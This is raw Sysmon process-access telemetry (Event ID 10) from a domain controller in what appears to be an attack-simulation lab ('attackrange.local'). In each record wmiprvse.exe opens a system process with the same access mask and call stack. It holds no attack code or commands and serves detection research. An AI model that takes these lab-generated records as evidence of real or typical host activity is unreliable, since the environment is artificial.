15:59:22.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024058Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024057Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499C-6008-5500-00000000A301}3796C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024056Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-499B-6008-5100-00000000A301}3588C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024055Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3600-00000000A301}3468C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024054Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3400-00000000A301}3124C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024053Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3300-00000000A301}2260C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024052Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3200-00000000A301}2612C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024051Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3100-00000000A301}2704C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024050Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-3000-00000000A301}3068C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024049Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2E00-00000000A301}3028C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024048Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2D00-00000000A301}2328C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024047Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2C00-00000000A301}2896C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024046Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024045Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2900-00000000A301}2792C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024044Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4997-6008-2800-00000000A301}2544C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024043Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4990-6008-2600-00000000A301}3044C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024042Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2400-00000000A301}2932C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024041Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-498C-6008-2300-00000000A301}2924C:\Users\Public\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024040Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:22.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4988-6008-2000-00000000A301}2388C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024039Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 